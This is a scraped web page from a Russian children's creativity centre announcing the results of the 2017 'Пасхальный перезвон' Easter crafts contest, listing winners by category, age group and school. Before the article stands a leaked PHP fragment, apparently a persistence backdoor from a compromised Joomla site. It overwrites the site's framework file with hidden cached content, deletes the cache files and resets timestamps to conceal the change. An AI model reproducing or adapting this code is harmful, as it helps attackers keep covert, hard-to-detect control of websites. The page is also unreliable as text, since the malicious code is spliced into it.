$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } «Пасхальный перезвон» 2017
МАУДО "Дом детского творчества п. Новосергиевка" Новосергиевского района Оренбургской области

Регистрация Вход

Зарегистрируйтесь, чтобы оставлять комментарии в гостевой книге



Спасибо за регистрацию

Ссылки

План мероприятий

Декабрь 2017
Пн Вт Ср Чт Пт Сб Вс
27 28 29 30 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Developed by JoomVision.com
Баннер
  • Toggle
  • Закрыть

«Пасхальный перезвон» 2017 PDF Печать E-mail

14 апреля были подведены итоги конкурса детского творчества «Пасхальный перезвон 2017», учрежденный Отделом образования администрации Новосергиевского района, Православным Приходом храма преподобного Сергия Радонежского п. Новосергиевка Оренбургской  Епархии Русской Православной Церкви и МОАУ ДОД «Дом детского творчества», посвященный празднованию Светлой Пасхи.

В конкурсе приняли участие 27 образовательных учреждений района: Верхнеплатовская, Привольненская, Краснополянская, Ржавская ООШ, Платовская, Кулагинская, Сузановская, Кувайская, Мустаевская, Рыбкинская, Лапазская, Хуторская, Нестеровская, , Уранская, Покровская, Электрозаводская, Барабановская, Берестовская, Старобелогорская СОШ, Балейский филиал МОБУ «Уранская СОШ», ГКОУ «С (к.) общеобразовательная школа-интернат с. Покровка», МАУДО «ДДТ», НСОШ №1, НСОШ №2, НСОШ №3, НСОШ №4.

Всего было прислано 125 работ, выполненных в различной технике и из разных материалов. 48 работ были выбраны для выставки в Православном храме преподобного Сергия Радонежского в п. Новосергиевка.

 

 

Номинация «Вязание»

4-6 лет.

1 место: Браткова Евангелина Дошк.гр. «Золотой ключик» Кулагинская СОШ

2 место: Васькин Алексей Дошк. Гр. «Лучик» Новосергиевская СОШ №4, рук. Карликова А.Н

1-4 кл.

1 место: Азнабаева Руфина Электрозаводская СОШ рук. Абдразакова Ф.А.

                Волков Александр Мустаевская СОШ

 2 место: Фаттакова Карина НСОШ №1

3 место: Жаббаров Арсений Мустаевская СОШ

5-6 кл.

1 место: Саттарова Диана Новосергиевская СОШ №1

2 место: Кутлиахметова Эльвира, Кувайская СОШ

3 место: Мохначева Дарья Уранская СОШ

                Цыганова Полина Ржавская ООШ

7-8 кл.

1 место: Пугачев Александр ГКОУ «С.(к.)школа-интернат с. Покровка»


Номинация «Пасхальная корзина»

4-7 лет:

1 место: Пасечная Татьяна Мустаевская СОШ

2 место: Зверев Александр Новосергиевская СОШ №1

1-7 кл.

1 место: Шалаева Алиса Нестеровская СОШ

                Эртман Алена Уранская СОШ

2 место: Волохова Владлена Электрозаводская СО

3 место: Держиева Вероника Хуторская СОШ

8-9 кл.

1 место: Гаршина Виктория Нестеровская СОШ

2 место: Энс Юлия Верхнеплатовская ООШ


Номинация "Пасхальная композиция"

6-7 лет

1 место: Дошкольная группа «Лучик» Новосергиевская СОШ №4

2 место: Беспалова Дарья Новосергиевская СОШ №

3 место: Эртман Дмитрий Уранская СОШ

1-4 кл

1 место: Раисова Рината Балейский филиал «Уранская СОШ»

2 место: Рахимова Ангелина Новосергиевская СОШ №3

3 место: Кутлиахметова Земфира, Гимранова Аделина, Кувайская СОШ

5-9 кл.

1 место: Курганова Екатерина ГКОУ «С.(к.)школа-интернат с. Покровка»

2 место: Соколов Денис Ржавская ООШ

3 место: Малахов Никита, Шишкин Николай, Муравьева Анна Покровская СОШ

                Тюркин Антон Лапазская СОШ


Номинация «Керамика»

1 место: Манукян Инесса Берестовская СОШ

                Пичурина Мария Электрозаводская СОШ

2 место: Творческое объединение «Керамика» МАУДО ДДТ

3 место: Жаббарова Софья Мустаевская СОШ

                Кисикбасов Альберт МАУДО ДДТ

 

Номинация «Пасхальное панно»

1 место: Карязин Антон Новосергиевская СОШ №1

                Новоженина Снежана Мустаевская СОШ

2 место: Кильдюшкина Мария Ржавская ООШ

 

Номинация «Канзаши» (работы из лент)

1 место: Мордвинцева Евгения Новосергиевская СОШ №3

2 место: Данкеева Алена Ржавская ООШ

                Сенькина Анастасия Новосергиевская СОШ №1

3 место: Ахметзянова Аделина Новосергиевская СОШ №1

                Ахмедова Камилла МАУДО «ДДТ»

                Мария Мальцева Новосергиевская СОШ №4

 

Номинация «Пасхальное яйцо»

 

2 место: Петуненкова Ангелина Старобелогорская СОШ

3 место: Кулаков Максим Новосергиевская СОШ №4

 

Номинация «Бумажная пластика»

1 место: Коллективная работа Новосергиевская СОШ №4

                Калганов Максим Максим Нестеровская СОШ

2 место: Мингазова Анастасия Новосергиевская СОШ №1

                Тюркина Полина Лапазская СОШ

 

Номинация «Работы из нетрадиционного материала»

1 место: Муртазин Динар Лапазская СОШ

2 место: Дубинина Елизавета Дошк.гр. «Золотой ключик» Кулагинская СОШ

3 место: Степанова Дарья Савельева Мария Верхнеплатовская ООШ

 

Номинация «Декупаж»

1 место: Сандаловская Ольга Новосергиевская СОШ №1

2 место: Шведкина Виктория Козловская ООШ

 

Номинация «Вышивка»

1 место: Качалова Евгения Новосергиевская СОШ №2

2 место: Корнилова Олеся Нестеровская СОШ

 

Номинация «Вышивка бисером»

1 место: Кечина Виктория Рыбкинская СОШ

2 место: Дедловский Дмитрий Верхнеплатовская ООШ

3 место: Шишкин Николай Покровская СОШ

                Малахов Никита Покровская СОШ

 

Номинация «Рисунок»

4-6 лет

1 место: Выгузова Вероника Дошкольная группа Новосергиевская СОШ №4

2 место: Яновская Алина Дошкольная группа Новосергиевская СОШ №4

1-2 кл.

1 место: Марявина София Новосергиевская СОШ №1

1 место: Раянова Иляна Новосергиевская СОШ №1

2 место: Корнилова Олеся Нестеровская СОШ

3 место: Штодина Надежда Новосергиевская СОШ №1

3-4 кл.

1 место: Гранкина Анастасия Нестеровская СОШ

                Звонок Дарья Нестеровская СОШ

                Кечина Анастасия Рыбкинская СОШ

                Кечина Полина Рыбкинская СОШ

2 место: Жилкин Николай Новосергиевская СОШ №1

3 место: Першина Алина Хуторская СОШ

5-6 кл.

1 место: Фролова Виктория Новосергиевская СОШ №4

                Мичкасов Георгий Новосергиевская СОШ №4

2 место: Корнилов Максим Нестеровская СОШ

3 место: Алексеев Владислав Новосергиевская СОШ №4

                Позднякова Нина Сузановская СОШ

7-8 кл.

1 место: Гришина Ксения Покровская СОШ

2 место: Забелина Кристина Нестеровская СОШ

                Мичкасова Юлия Новосергиевская СОШ №4

3 место: Тишибаева Татьяна Сузановская СОШ

                Ваненкова Ева Верхнеплатовская ООШ

 

comback_black_green_75

Обновлено 27.04.2017 11:21